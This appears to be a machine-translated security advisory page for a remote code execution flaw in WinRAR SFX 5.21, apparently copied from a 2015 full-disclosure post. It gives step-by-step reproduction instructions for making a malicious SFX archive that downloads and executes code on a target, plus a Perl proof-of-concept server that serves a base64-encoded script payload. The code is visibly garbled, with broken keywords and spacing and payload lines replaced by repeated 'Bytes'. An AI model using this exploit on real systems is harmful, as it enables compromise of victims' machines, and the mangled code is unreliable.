WinRAR SFX v5.21 Remote Code Execution Vulnerability

WinRAR SFX v5.21 Remote Code Execution Vulnerability
WinRAR SFX v5.21 Remote Code Execution Vulnerability

Release date:
Updated on:

Affected Systems:

WinRar WinRar 5.21

Description:

WinRAR is a popular compression/decompression tool.

The Text and Icon function of WInRAR SFX v5.21, Text to display in SFX window module has the remote code execution security vulnerability. Remote attackers exploit this vulnerability by using compressed packages with malicious loads, after successful execution, you can execute specific system code to crack the system, network, or device.

<* Source: vulnerability laboratory (research @ vulnerability-lab com)
Mohammad Reza esparham

Link: http://seclists.org/fulldisclosure/2015/Sep/106
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

The code execution vulnerability can be exploited by remote attackers without privilege system user account or user
Interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below
Continue.

Manual steps to reproduce the vulnerability...
1. Run perl code: perl poc. pl
2. Right Click on any file and select "add to archive ..."
3. Select "Create SFX archive"
4. Go to the Advanced Menu and select "SFX options ..."
5. Go to the "Text and icon" Menu
6. Copy this perl output (HTML) and past on "Text to display in SFX window"
7. Click OK -- OK
8. Your SFX file Created
9. Just open sfx file
10. Your Link Download/Execute on your target
11. Successful reproduce of the code execution vulnerability!


PoC: Exploit Code
#! /Usr/bin/perl
# Title: WinRaR SFX-Remote Code Execution
# Affected Versions: All Version
# Tested on Windows 7/Server 2008
#
# Author: Hammad Reza esparham
# Linkedin: https://ir.linkedin.com/in/rezasp
# E-Mail: me [at] reza [dot] es, reza. esparham [at] gmail [dot] com
# Website: www. reza. es
# Twitter: https://twitter.com/rezesp
# FaceBook: https://www.facebook.com/reza.espargham
#
# ID: MS14-064

Use strict;
Use warnings;
Use IO: Socket;
Use MIME: Base64 qw (decode_base64 );
Use Socket 'inet _ ntoa ';
Use Sys: Hostname 'hostname ';

Print "maid ";
My $ ip = inet_ntoa (scalar gethostbyname (hostname () | 'localhost '));

My $ port = 80;

Print "Winrar HTML Code \ n ". 'Print "Winrar HTML Code \ n ". '
My $ server = new IO: Socket: INET (Proto => 'tcp ',
LocalPort => $ port,
Listen => SOMAXCONN,
ReuseAddr => 1)
Or die "Unable to create server socket ";

# Server loop
While (my $ client = $ server-> accept ())
{
My $ client_info;
While (<$ client>)
{
Last if/^ \ r \ n $ /;
$ Client_info. = $ _;
}
Incoming ($ client, $ client_info );
}

Sub incoming
{
Print "\ n = Incoming Request: \ n ";
My $ client = shift;
Print $ client & buildResponse ($ client, shift );
Close ($ client );
}

Sub buildResponse
{
My $ client = shift;
My $ client_info = shift;

My $ poc = "Workshop
DWxhdGVJRTgiID4KPGhlYWQ + cw.vagvhzd4kpgjvzhk + CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJT
Bytes
Bytes
Bytes
AHR0cDovL3RoZS5lYXJ0aC5saS9 + c2d0yxroyw0vchv0dhkvbgf0zxn0l4244ni9wdxr0es5legun
Bytes
Bytes
Bytes
CHQ + quit
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
ICAgICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw + mckgifrozw4gicagciagicagicagicag
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Pipeline +
CiAKPC9ib2R5Pgo8L2h0bWw + ";
$ Poc = decode_base64 ($ poc );

My $ r = "HTTP/1.0 200 OK \ r \ nContent-type: text/html \ r \ n
$ Poc ";
Return $ r;
}

Suggestion:

Vendor patch:

WinRar
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.win-rar.com/start.html

This article permanently updates the link address: